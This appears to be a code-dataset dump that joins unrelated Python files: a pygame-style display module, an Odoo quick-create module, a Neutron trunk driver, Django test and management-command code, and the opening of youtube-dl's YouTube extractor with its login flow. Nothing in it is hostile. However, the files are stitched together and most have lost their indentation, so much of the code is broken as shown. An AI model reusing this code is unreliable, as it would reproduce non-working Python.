attributes you requested. You will not always get what you
requested.
See `gl_set_attribute` for a list of flags.
:Parameters:
- `flag`: int
:rtype: int
'''
_video_init_check()
return SDL_GL_GetAttribute(flag)
def get_active():
'''Get state of display mode
    Returns True if the current display is active on the screen. This is
    done with the call to ``pygame.display.set_mode()``. It is
    potentially subject to the activity of a running window manager.
    Calling `set_mode` will change all existing display surfaces
to reference the new display mode. The old display surface will
be lost after this call.
'''
    #brython
return SDL_GetAppState() & SDL_APPACTIVE != 0
def iconify():
'''Iconify the display surface.
Request the window for the display surface be iconified or hidden. Not all
systems and displays support an iconified display. The function will
    return True if successful.
When the display is iconified pygame.display.get_active() will return
False. The event queue should receive a pygame.APPACTIVE event when the
window has been iconified.
:rtype: bool
:return: True on success
'''
_video_init_check()
try:
SDL_WM_IconifyWindow()
return True
except SDL_Exception:
return False
def toggle_fullscreen():
'''Switch between fullscreen and windowed displays.
Switches the display window between windowed and fullscreen modes. This
function only works under the unix x11 video driver. For most situations
it is better to call pygame.display.set_mode() with new display flags.
:rtype: bool
'''
_video_init_check()
screen = SDL_GetVideoSurface()
try:
SDL_WM_ToggleFullScreen(screen)
return True
except SDL_Exception:
return False
return False
def set_gamma(red, green=None, blue=None):
'''Change the hardware gamma ramps.
Set the red, green, and blue gamma values on the display hardware. If the
green and blue arguments are not passed, they will both be the same as
red. Not all systems and hardware support gamma ramps, if the function
succeeds it will return True.
A gamma value of 1.0 creates a linear color table. Lower values will
darken the display and higher values will brighten.
:Parameters:
`red` : float
Red gamma value
`green` : float
Green gamma value
`blue` : float
Blue gamma value
:rtype: bool
'''
    #brython
_video_init_check()
if not green or not blue:
green = red
blue = red
try:
SDL_SetGamma(red, green, blue)
return True
except SDL_Exception:
return False
def set_gamma_ramp(red, green, blue):
'''Change the hardware gamma ramps with a custom lookup.
Set the red, green, and blue gamma ramps with an explicit lookup table.
Each argument should be sequence of 256 integers. The integers should
range between 0 and 0xffff. Not all systems and hardware support gamma
ramps, if the function succeeds it will return True.
:Parameters:
`red` : sequence of int
Sequence of 256 ints in range [0, 0xffff] giving red component
lookup.
`green` : sequence of int
Sequence of 256 ints in range [0, 0xffff] giving green component
lookup.
`blue` : sequence of int
Sequence of 256 ints in range [0, 0xffff] giving blue component
lookup.
:rtype: bool
'''
_video_init_check()
try:
SDL_SetGammaRamp(red, green, blue)
return True
except SDL_Exception:
return False
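# Editor's sketch (illustrative only, not part of the original module): building
# the 256-entry lookup tables expected by set_gamma_ramp() from a single gamma
# value. The formula is a simple power curve clamped to [0, 0xffff]; the gamma
# value is an arbitrary example and the function is never called here.
def _example_gamma_ramp(gamma=1.8):
    ramp = [min(0xffff, int(((i / 255.0) ** (1.0 / gamma)) * 0xffff)) for i in range(256)]
    return ramp, ramp, ramp   # identical red, green and blue ramps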
def set_icon(surface):
'''Change the system image for the display window.
Sets the runtime icon the system will use to represent the display window.
All windows default to a simple pygame logo for the window icon.
You can pass any surface, but most systems want a smaller image around
32x32. The image can have colorkey transparency which will be passed to
the system.
Some systems do not allow the window icon to change after it has been
shown. This function can be called before `set_mode` to
create the icon before the display mode is set.
:Parameters:
`surface` : `Surface`
Surface containing image to set.
'''
global _icon_was_set
pygame.base._video_autoinit()
SDL_WM_SetIcon(surface._surf, None)
_icon_was_set = 1
def set_caption(title, icontitle=None):
'''Set the current window caption.
If the display has a window title, this function will change the name on
the window. Some systems support an alternate shorter title to be used for
minimized displays.
:Parameters:
`title` : unicode
Window caption
`icontitle` : unicode
Icon caption, if supported
'''
if not icontitle:
icontitle = title
SDL_WM_SetCaption(title, icontitle)
def get_caption():
'''Get the current window caption.
Returns the title and icontitle for the display Surface. These will often
be the same value.
:rtype: (unicode, unicode)
:return: title, icontitle
'''
# XXX deviation from pygame, don't return () if title == None
#return SDL_WM_GetCaption()
return "", ""
def set_palette(palette=None):
'''Set the display color palette for indexed displays.
This will change the video display color palette for 8bit displays. This
does not change the palette for the actual display Surface, only the
palette that is used to display the Surface. If no palette argument is
passed, the system default palette will be restored. The palette is a
sequence of RGB triplets.
:Parameters:
`palette` : sequence of (int, int, int)
Sequence having at most 256 RGB triplets.
'''
_video_init_check()
surf = SDL_GetVideoSurface()
if not surf:
raise pygame.base.error('No display mode is set')
if surf.format.BytesPerPixel != 1 or not surf.format._palette:
raise pygame.base.error('Display mode is not colormapped')
if not palette:
SDL_SetPalette(surf, SDL_PHYSPAL, surf.format.palette.colors, 0)
length = min(surf.format.palette.ncolors, len(palette))
colors = [SDL_Color(r, g, b) for r, g, b in palette[:length]]
SDL_SetPalette(surf, SDL_PHYSPAL, colors, 0)
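# Editor's sketch (illustrative only, not part of the original module): a simple
# 256-entry grayscale palette in the "sequence of RGB triplets" format expected
# by set_palette(). Never called here.
def _example_grayscale_palette():
    return [(i, i, i) for i in range(256)]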
def _video_init_check():
if not SDL_WasInit(SDL_INIT_VIDEO):
raise pygame.base.error('video system not initialized')
| gpl-3.0 |
jjscarafia/server-tools | base_optional_quick_create/model.py | 41 | 2507 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2013 Agile Business Group sagl (<http://www.agilebg.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
from openerp import SUPERUSER_ID
from openerp.tools.translate import _
class ir_model(orm.Model):
_inherit = 'ir.model'
_columns = {
'avoid_quick_create': fields.boolean('Avoid quick create'),
}
def _wrap_name_create(self, old_create, model):
def wrapper(cr, uid, name, context=None):
raise orm.except_orm(
_('Error'),
_("Can't create quickly. Opening create form"))
return wrapper
def _register_hook(self, cr, ids=None):
if ids is None:
ids = self.search(cr, SUPERUSER_ID, [])
for model in self.browse(cr, SUPERUSER_ID, ids):
if model.avoid_quick_create:
model_name = model.model
model_obj = self.pool.get(model_name)
if model_obj and not hasattr(model_obj, 'check_quick_create'):
model_obj.name_create = self._wrap_name_create(
model_obj.name_create, model_name)
model_obj.check_quick_create = True
return True
def create(self, cr, uid, vals, context=None):
res_id = super(ir_model, self).create(cr, uid, vals, context=context)
self._register_hook(cr, [res_id])
return res_id
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
res = super(ir_model, self).write(cr, uid, ids, vals, context=context)
self._register_hook(cr, ids)
return res
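    # Editor's note (illustrative sketch, not part of the original module): the
    # wrapper installed by _register_hook() replaces name_create() on every
    # model flagged with avoid_quick_create, so a quick-create attempt such as
    #
    #   self.pool.get('res.partner').name_create(cr, uid, 'New partner')
    #
    # now raises except_orm("Can't create quickly. Opening create form"),
    # forcing the client back to the full creation form. 'res.partner' is only
    # an example model name.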
| agpl-3.0 |
cloudbase/neutron | neutron/services/trunk/drivers/linuxbridge/driver.py | 4 | 1688 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from neutron_lib import constants
from neutron.extensions import portbindings
from neutron.services.trunk import constants as trunk_consts
from neutron.services.trunk.drivers import base
LOG = logging.getLogger(__name__)
NAME = 'linuxbridge'
SUPPORTED_INTERFACES = (
portbindings.VIF_TYPE_BRIDGE,
)
SUPPORTED_SEGMENTATION_TYPES = (
trunk_consts.VLAN,
)
class LinuxBridgeDriver(base.DriverBase):
"""Server-side Trunk driver for the ML2 Linux Bridge driver."""
@property
def is_loaded(self):
try:
return NAME in cfg.CONF.ml2.mechanism_drivers
except cfg.NoSuchOptError:
return False
@classmethod
def create(cls):
return cls(NAME, SUPPORTED_INTERFACES, SUPPORTED_SEGMENTATION_TYPES,
constants.AGENT_TYPE_LINUXBRIDGE, can_trunk_bound_port=True)
def register():
# NOTE(kevinbenton): the thing that is keeping this from being
# immediately garbage collected is that it registers callbacks
LinuxBridgeDriver.create()
LOG.debug("Linux bridge trunk driver initialized.")
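# Editor's note (illustrative, not part of the original module): is_loaded
# above only checks the ml2 mechanism_drivers option, so the driver becomes
# active with a configuration along these lines (values are an example only):
#
#   [ml2]
#   mechanism_drivers = linuxbridge,l2population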
| apache-2.0 |
vmarkovtsev/django | tests/invalid_models_tests/test_backend_specific.py | 191 | 1024 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
from django.core.checks import Error
from django.db import connections, models
from django.test import mock
from .base import IsolatedModelsTestCase
def dummy_allow_migrate(db, app_label, **hints):
# Prevent checks from being run on the 'other' database, which doesn't have
# its check_field() method mocked in the test.
return db == 'default'
class BackendSpecificChecksTests(IsolatedModelsTestCase):
@mock.patch('django.db.models.fields.router.allow_migrate', new=dummy_allow_migrate)
def test_check_field(self):
""" Test if backend specific checks are performed. """
error = Error('an error', hint=None)
class Model(models.Model):
field = models.IntegerField()
field = Model._meta.get_field('field')
with mock.patch.object(connections['default'].validation, 'check_field', return_value=[error]):
errors = field.check()
self.assertEqual(errors, [error])
| bsd-3-clause |
caot/intellij-community | python/lib/Lib/site-packages/django/core/management/base.py | 248 | 16452 | """
Base classes for writing management commands (named commands which can
be executed through ``django-admin.py`` or ``manage.py``).
"""
import os
import sys
from optparse import make_option, OptionParser
import django
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import color_style
from django.utils.encoding import smart_str
class CommandError(Exception):
"""
Exception class indicating a problem while executing a management
command.
If this exception is raised during the execution of a management
command, it will be caught and turned into a nicely-printed error
message to the appropriate output stream (i.e., stderr); as a
result, raising this exception (with a sensible description of the
error) is the preferred way to indicate that something has gone
wrong in the execution of a command.
"""
pass
def handle_default_options(options):
"""
Include any default options that all commands should accept here
so that ManagementUtility can handle them before searching for
user commands.
"""
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
if options.pythonpath:
sys.path.insert(0, options.pythonpath)
class BaseCommand(object):
"""
The base class from which all management commands ultimately
derive.
Use this class if you want access to all of the mechanisms which
parse the command-line arguments and work out what code to call in
response; if you don't need to change any of that behavior,
consider using one of the subclasses defined in this file.
If you are interested in overriding/customizing various aspects of
the command-parsing and -execution behavior, the normal flow works
as follows:
1. ``django-admin.py`` or ``manage.py`` loads the command class
and calls its ``run_from_argv()`` method.
2. The ``run_from_argv()`` method calls ``create_parser()`` to get
an ``OptionParser`` for the arguments, parses them, performs
any environment changes requested by options like
``pythonpath``, and then calls the ``execute()`` method,
passing the parsed arguments.
3. The ``execute()`` method attempts to carry out the command by
calling the ``handle()`` method with the parsed arguments; any
output produced by ``handle()`` will be printed to standard
output and, if the command is intended to produce a block of
SQL statements, will be wrapped in ``BEGIN`` and ``COMMIT``.
4. If ``handle()`` raised a ``CommandError``, ``execute()`` will
instead print an error message to ``stderr``.
Thus, the ``handle()`` method is typically the starting point for
subclasses; many built-in commands and command types either place
all of their logic in ``handle()``, or perform some additional
parsing work in ``handle()`` and then delegate from it to more
specialized methods as needed.
Several attributes affect behavior at various steps along the way:
``args``
A string listing the arguments accepted by the command,
suitable for use in help messages; e.g., a command which takes
a list of application names might set this to '<appname
appname ...>'.
``can_import_settings``
A boolean indicating whether the command needs to be able to
import Django settings; if ``True``, ``execute()`` will verify
that this is possible before proceeding. Default value is
``True``.
``help``
A short description of the command, which will be printed in
help messages.
``option_list``
This is the list of ``optparse`` options which will be fed
into the command's ``OptionParser`` for parsing arguments.
``output_transaction``
A boolean indicating whether the command outputs SQL
statements; if ``True``, the output will automatically be
wrapped with ``BEGIN;`` and ``COMMIT;``. Default value is
``False``.
``requires_model_validation``
A boolean; if ``True``, validation of installed models will be
performed prior to executing the command. Default value is
``True``. To validate an individual application's models
rather than all applications' models, call
``self.validate(app)`` from ``handle()``, where ``app`` is the
application's Python module.
"""
# Metadata about this command.
option_list = (
make_option('-v', '--verbosity', action='store', dest='verbosity', default='1',
type='choice', choices=['0', '1', '2', '3'],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all output'),
make_option('--settings',
help='The Python path to a settings module, e.g. "myproject.settings.main". If this isn\'t provided, the DJANGO_SETTINGS_MODULE environment variable will be used.'),
make_option('--pythonpath',
help='A directory to add to the Python path, e.g. "/home/djangoprojects/myproject".'),
make_option('--traceback', action='store_true',
help='Print traceback on exception'),
)
help = ''
args = ''
# Configuration shortcuts that alter various logic.
can_import_settings = True
requires_model_validation = True
output_transaction = False # Whether to wrap the output in a "BEGIN; COMMIT;"
def __init__(self):
self.style = color_style()
def get_version(self):
"""
Return the Django version, which should be correct for all
built-in Django commands. User-supplied commands should
override this method.
"""
return django.get_version()
def usage(self, subcommand):
"""
Return a brief description of how to use this command, by
default from the attribute ``self.help``.
"""
usage = '%%prog %s [options] %s' % (subcommand, self.args)
if self.help:
return '%s\n\n%s' % (usage, self.help)
else:
return usage
def create_parser(self, prog_name, subcommand):
"""
Create and return the ``OptionParser`` which will be used to
parse the arguments to this command.
"""
return OptionParser(prog=prog_name,
usage=self.usage(subcommand),
version=self.get_version(),
option_list=self.option_list)
def print_help(self, prog_name, subcommand):
"""
Print the help message for this command, derived from
``self.usage()``.
"""
parser = self.create_parser(prog_name, subcommand)
parser.print_help()
def run_from_argv(self, argv):
"""
Set up any environment changes requested (e.g., Python path
and Django settings), then run this command.
"""
parser = self.create_parser(argv[0], argv[1])
options, args = parser.parse_args(argv[2:])
handle_default_options(options)
self.execute(*args, **options.__dict__)
def execute(self, *args, **options):
"""
Try to execute this command, performing model validation if
needed (as controlled by the attribute
``self.requires_model_validation``). If the command raises a
``CommandError``, intercept it and print it sensibly to
stderr.
"""
# Switch to English, because django-admin.py creates database content
# like permissions, and those shouldn't contain any translations.
# But only do this if we can assume we have a working settings file,
# because django.utils.translation requires settings.
if self.can_import_settings:
try:
from django.utils import translation
translation.activate('en-us')
except ImportError, e:
# If settings should be available, but aren't,
# raise the error and quit.
sys.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
try:
self.stdout = options.get('stdout', sys.stdout)
self.stderr = options.get('stderr', sys.stderr)
if self.requires_model_validation:
self.validate()
output = self.handle(*args, **options)
if output:
if self.output_transaction:
# This needs to be imported here, because it relies on
# settings.
from django.db import connections, DEFAULT_DB_ALIAS
connection = connections[options.get('database', DEFAULT_DB_ALIAS)]
if connection.ops.start_transaction_sql():
self.stdout.write(self.style.SQL_KEYWORD(connection.ops.start_transaction_sql()) + '\n')
self.stdout.write(output)
if self.output_transaction:
self.stdout.write('\n' + self.style.SQL_KEYWORD("COMMIT;") + '\n')
except CommandError, e:
self.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
def validate(self, app=None, display_num_errors=False):
"""
Validates the given app, raising CommandError for any errors.
If app is None, then this will validate all installed apps.
"""
from django.core.management.validation import get_validation_errors
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
s = StringIO()
num_errors = get_validation_errors(s, app)
if num_errors:
s.seek(0)
error_text = s.read()
raise CommandError("One or more models did not validate:\n%s" % error_text)
if display_num_errors:
self.stdout.write("%s error%s found\n" % (num_errors, num_errors != 1 and 's' or ''))
def handle(self, *args, **options):
"""
The actual logic of the command. Subclasses must implement
this method.
"""
raise NotImplementedError()
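# Editor's sketch (illustrative, not part of Django): a minimal custom command
# showing the flow documented above -- option_list feeds the OptionParser,
# handle() receives the parsed arguments, and raising CommandError produces a
# clean error message on stderr. All names below (app, command, option) are
# hypothetical.
#
#   # myapp/management/commands/greet.py
#   from optparse import make_option
#   from django.core.management.base import BaseCommand, CommandError
#
#   class Command(BaseCommand):
#       args = '<name>'
#       help = 'Prints a greeting for the given name.'
#       option_list = BaseCommand.option_list + (
#           make_option('--shout', action='store_true', dest='shout',
#                       default=False, help='Print the greeting in upper case.'),
#       )
#
#       def handle(self, *args, **options):
#           if not args:
#               raise CommandError('Please provide a name.')
#           greeting = 'Hello, %s!' % args[0]
#           if options['shout']:
#               greeting = greeting.upper()
#           return greeting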
class AppCommand(BaseCommand):
"""
A management command which takes one or more installed application
names as arguments, and does something with each of them.
Rather than implementing ``handle()``, subclasses must implement
``handle_app()``, which will be called once for each application.
"""
args = '<appname appname ...>'
def handle(self, *app_labels, **options):
from django.db import models
if not app_labels:
raise CommandError('Enter at least one appname.')
try:
app_list = [models.get_app(app_label) for app_label in app_labels]
except (ImproperlyConfigured, ImportError), e:
raise CommandError("%s. Are you sure your INSTALLED_APPS setting is correct?" % e)
output = []
for app in app_list:
app_output = self.handle_app(app, **options)
if app_output:
output.append(app_output)
return '\n'.join(output)
def handle_app(self, app, **options):
"""
Perform the command's actions for ``app``, which will be the
Python module corresponding to an application name given on
the command line.
"""
raise NotImplementedError()
class LabelCommand(BaseCommand):
"""
A management command which takes one or more arbitrary arguments
(labels) on the command line, and does something with each of
them.
Rather than implementing ``handle()``, subclasses must implement
``handle_label()``, which will be called once for each label.
If the arguments should be names of installed applications, use
``AppCommand`` instead.
"""
args = '<label label ...>'
label = 'label'
def handle(self, *labels, **options):
if not labels:
raise CommandError('Enter at least one %s.' % self.label)
output = []
for label in labels:
label_output = self.handle_label(label, **options)
if label_output:
output.append(label_output)
return '\n'.join(output)
def handle_label(self, label, **options):
"""
Perform the command's actions for ``label``, which will be the
string as given on the command line.
"""
raise NotImplementedError()
class NoArgsCommand(BaseCommand):
"""
A command which takes no arguments on the command line.
Rather than implementing ``handle()``, subclasses must implement
``handle_noargs()``; ``handle()`` itself is overridden to ensure
no arguments are passed to the command.
Attempting to pass arguments will raise ``CommandError``.
"""
args = ''
def handle(self, *args, **options):
if args:
raise CommandError("Command doesn't accept any arguments")
return self.handle_noargs(**options)
def handle_noargs(self, **options):
"""
Perform this command's actions.
"""
raise NotImplementedError()
def copy_helper(style, app_or_project, name, directory, other_name=''):
"""
Copies either a Django application layout template or a Django project
layout template into the specified directory.
"""
# style -- A color style object (see django.core.management.color).
# app_or_project -- The string 'app' or 'project'.
# name -- The name of the application or project.
# directory -- The directory to which the layout template should be copied.
# other_name -- When copying an application layout, this should be the name
# of the project.
import re
import shutil
other = {'project': 'app', 'app': 'project'}[app_or_project]
if not re.search(r'^[_a-zA-Z]\w*$', name): # If it's not a valid directory name.
# Provide a smart error message, depending on the error.
if not re.search(r'^[_a-zA-Z]', name):
message = 'make sure the name begins with a letter or underscore'
else:
message = 'use only numbers, letters and underscores'
raise CommandError("%r is not a valid %s name. Please %s." % (name, app_or_project, message))
top_dir = os.path.join(directory, name)
try:
os.mkdir(top_dir)
except OSError, e:
raise CommandError(e)
# Determine where the app or project templates are. Use
# django.__path__[0] because we don't know into which directory
# django has been installed.
template_dir = os.path.join(django.__path__[0], 'conf', '%s_template' % app_or_project)
for d, subdirs, files in os.walk(template_dir):
relative_dir = d[len(template_dir)+1:].replace('%s_name' % app_or_project, name)
if relative_dir:
os.mkdir(os.path.join(top_dir, relative_dir))
for subdir in subdirs[:]:
if subdir.startswith('.'):
subdirs.remove(subdir)
for f in files:
if not f.endswith('.py'):
# Ignore .pyc, .pyo, .py.class etc, as they cause various
# breakages.
continue
path_old = os.path.join(d, f)
path_new = os.path.join(top_dir, relative_dir, f.replace('%s_name' % app_or_project, name))
fp_old = open(path_old, 'r')
fp_new = open(path_new, 'w')
fp_new.write(fp_old.read().replace('{{ %s_name }}' % app_or_project, name).replace('{{ %s_name }}' % other, other_name))
fp_old.close()
fp_new.close()
try:
shutil.copymode(path_old, path_new)
_make_writeable(path_new)
except OSError:
sys.stderr.write(style.NOTICE("Notice: Couldn't set permission bits on %s. You're probably using an uncommon filesystem setup. No problem.\n" % path_new))
def _make_writeable(filename):
"""
Make sure that the file is writeable. Useful if our source is
read-only.
"""
import stat
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
| apache-2.0 |
jonyroda97/redbot-amigosprovaveis | lib/youtube_dl/extractor/youtube.py | 1 | 131830 | # coding: utf-8
from __future__ import unicode_literals
import itertools
import json
import os.path
import random
import re
import time
import traceback
from .common import InfoExtractor, SearchInfoExtractor
from ..jsinterp import JSInterpreter
from ..swfinterp import SWFInterpreter
from ..compat import (
compat_chr,
compat_kwargs,
compat_parse_qs,
compat_urllib_parse_unquote,
compat_urllib_parse_unquote_plus,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urlparse,
compat_str,
)
from ..utils import (
clean_html,
error_to_compat_str,
ExtractorError,
float_or_none,
get_element_by_attribute,
get_element_by_id,
int_or_none,
mimetype2ext,
orderedSet,
parse_codecs,
parse_duration,
qualities,
remove_quotes,
remove_start,
smuggle_url,
str_to_int,
try_get,
unescapeHTML,
unified_strdate,
unsmuggle_url,
uppercase_escape,
urlencode_postdata,
)
class YoutubeBaseInfoExtractor(InfoExtractor):
"""Provide base functions for Youtube extractors"""
_LOGIN_URL = 'https://accounts.google.com/ServiceLogin'
_TWOFACTOR_URL = 'https://accounts.google.com/signin/challenge'
_LOOKUP_URL = 'https://accounts.google.com/_/signin/sl/lookup'
_CHALLENGE_URL = 'https://accounts.google.com/_/signin/sl/challenge'
_TFA_URL = 'https://accounts.google.com/_/signin/challenge?hl=en&TL={0}'
_NETRC_MACHINE = 'youtube'
# If True it will raise an error if no login info is provided
_LOGIN_REQUIRED = False
_PLAYLIST_ID_RE = r'(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)[0-9A-Za-z-_]{10,}'
def _set_language(self):
self._set_cookie(
'.youtube.com', 'PREF', 'f1=50000000&hl=en',
# YouTube sets the expire time to about two months
expire_time=time.time() + 2 * 30 * 24 * 3600)
def _ids_to_results(self, ids):
return [
self.url_result(vid_id, 'Youtube', video_id=vid_id)
for vid_id in ids]
def _login(self):
"""
Attempt to log in to YouTube.
True is returned if successful or skipped.
False is returned if login failed.
If _LOGIN_REQUIRED is set and no authentication was provided, an error is raised.
"""
username, password = self._get_login_info()
# No authentication to be performed
if username is None:
if self._LOGIN_REQUIRED and self._downloader.params.get('cookiefile') is None:
raise ExtractorError('No login info available, needed for using %s.' % self.IE_NAME, expected=True)
return True
login_page = self._download_webpage(
self._LOGIN_URL, None,
note='Downloading login page',
errnote='unable to fetch login page', fatal=False)
if login_page is False:
return
login_form = self._hidden_inputs(login_page)
def req(url, f_req, note, errnote):
data = login_form.copy()
data.update({
'pstMsg': 1,
'checkConnection': 'youtube',
'checkedDomains': 'youtube',
'hl': 'en',
'deviceinfo': '[null,null,null,[],null,"US",null,null,[],"GlifWebSignIn",null,[null,null,[]]]',
'f.req': json.dumps(f_req),
'flowName': 'GlifWebSignIn',
'flowEntry': 'ServiceLogin',
})
return self._download_json(
url, None, note=note, errnote=errnote,
transform_source=lambda s: re.sub(r'^[^[]*', '', s),
fatal=False,
data=urlencode_postdata(data), headers={
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
'Google-Accounts-XSRF': 1,
})
def warn(message):
self._downloader.report_warning(message)
lookup_req = [
username,
None, [], None, 'US', None, None, 2, False, True,
[
None, None,
[2, 1, None, 1,
'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn',
None, [], 4],
1, [None, None, []], None, None, None, True
],
username,
]
lookup_results = req(
self._LOOKUP_URL, lookup_req,
'Looking up account info', 'Unable to look up account info')
if lookup_results is False:
return False
user_hash = try_get(lookup_results, lambda x: x[0][2], compat_str)
if not user_hash:
warn('Unable to extract user hash')
return False
challenge_req = [
user_hash,
None, 1, None, [1, None, None, None, [password, None, True]],
[
None, None, [2, 1, None, 1, 'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn', None, [], 4],
1, [None, None, []], None, None, None, True
]]
challenge_results = req(
self._CHALLENGE_URL, challenge_req,
'Logging in', 'Unable to log in')
if challenge_results is False:
return
login_res = try_get(challenge_results, lambda x: x[0][5], list)
if login_res:
login_msg = try_get(login_res, lambda x: x[5], compat_str)
warn(
'Unable to login: %s' % 'Invalid password'
if login_msg == 'INCORRECT_ANSWER_ENTERED' else login_msg)
return False
res = try_get(challenge_results, lambda x: x[0][-1], list)
if not res:
warn('Unable to extract result entry')
return False
login_challenge = try_get(res, lambda x: x[0][0], list)
if login_challenge:
challenge_str = try_get(login_challenge, lambda x: x[2], compat_str)
if challenge_str == 'TWO_STEP_VERIFICATION':
# SEND_SUCCESS - TFA code has been successfully sent to phone
# QUOTA_EXCEEDED - reached the limit of TFA codes
status = try_get(login_challenge, lambda x: x[5], compat_str)
if status == 'QUOTA_EXCEEDED':
warn('Exceeded the limit of TFA codes, try later')
return False
tl = try_get(challenge_results, lambda x: x[1][2], compat_str)
if not tl:
warn('Unable to extract TL')
return False
tfa_code = self._get_tfa_info('2-step verification code')
if not tfa_code:
warn(
'Two-factor authentication required. Provide it either interactively or with --twofactor <code>'
'(Note that only TOTP (Google Authenticator App) codes work at this time.)')
return False
tfa_code = remove_start(tfa_code, 'G-')
tfa_req = [
user_hash, None, 2, None,
[
9, None, None, None, None, None, None, None,
[None, tfa_code, True, 2]
]]
tfa_results = req(
self._TFA_URL.format(tl), tfa_req,
'Submitting TFA code', 'Unable to submit TFA code')
if tfa_results is False:
return False
tfa_res = try_get(tfa_results, lambda x: x[0][5], list)
if tfa_res:
tfa_msg = try_get(tfa_res, lambda x: x[5], compat_str)
warn(
'Unable to finish TFA: %s' % 'Invalid TFA code'
if tfa_msg == 'INCORRECT_ANSWER_ENTERED' else tfa_msg)
return False
check_cookie_url = try_get(
tfa_results, lambda x: x[0][-1][2], compat_str)
else:
CHALLENGES = {
'LOGIN_CHALLENGE': "This device isn't recognized. For your security, Google wants to make sure it's really you.",
'USERNAME_RECOVERY': 'Please provide additional information to aid in the recovery process.',
'REAUTH': "There is something unusual about your activity. For your security, Google wants to make sure it's really you.",
}
challenge = CHALLENGES.get(
challenge_str,
'%s returned error %s.' % (self.IE_NAME, challenge_str))
warn('%s\nGo to https://accounts.google.com/, login and solve a challenge.' % challenge)
return False
else:
check_cookie_url = try_get(res, lambda x: x[2], compat_str)
if not check_cookie_url:
warn('Unable to extract CheckCookie URL')
return False
check_cookie_results = self._download_webpage(
check_cookie_url, None, 'Checking cookie', fatal=False)
if check_cookie_results is False:
return False
if 'https://myaccount.google.com/' not in check_cookie_results:
warn('Unable to log in')
return False
return True
def _download_webpage_handle(self, *args, **kwargs):
kwargs.setdefault('query', {})['disable_polymer'] = 'true'
return super(YoutubeBaseInfoExtractor, self)._download_webpage_handle(
*args, **compat_kwargs(kwargs))
def _real_initialize(self):
if self._downloader is None:
return
self._set_language()
if not self._login():
return
class YoutubeEntryListBaseInfoExtractor(YoutubeBaseInfoExtractor):
# Extract entries from page with "Load more" button
def _entries(self, page, playlist_id):
more_widget_html = content_html = page
for page_num in itertools.count(1):
for entry in self._process_page(content_html):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), playlist_id,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
if not content_html.strip():
# Some webpages show a "Load more" button but they don't
# have more videos
break
more_widget_html = more['load_more_widget_html']
class YoutubePlaylistBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for video_id, video_title in self.extract_videos_from_page(content):
yield self.url_result(video_id, 'Youtube', video_id, video_title)
def extract_videos_from_page(self, page):
ids_in_page = []
titles_in_page = []
for mobj in re.finditer(self._VIDEO_RE, page):
            # The link with index 0 is not the first video of the playlist (not sure if this is still the case)
if 'index' in mobj.groupdict() and mobj.group('id') == '0':
continue
video_id = mobj.group('id')
video_title = unescapeHTML(mobj.group('title'))
if video_title:
video_title = video_title.strip()
try:
idx = ids_in_page.index(video_id)
if video_title and not titles_in_page[idx]:
titles_in_page[idx] = video_title
except ValueError:
ids_in_page.append(video_id)
titles_in_page.append(video_title)
return zip(ids_in_page, titles_in_page)
class YoutubePlaylistsBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for playlist_id in orderedSet(re.findall(
r'<h3[^>]+class="[^"]*yt-lockup-title[^"]*"[^>]*><a[^>]+href="/?playlist\?list=([0-9A-Za-z-_]{10,})"',
content)):
yield self.url_result(
'https://www.youtube.com/playlist?list=%s' % playlist_id, 'YoutubePlaylist')
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
title = self._og_search_title(webpage, fatal=False)
return self.playlist_result(self._entries(webpage, playlist_id), playlist_id, title)
class YoutubeIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com'
_VALID_URL = r"""(?x)^
(
(?:https?://|//) # http(s):// or protocol-independent URL
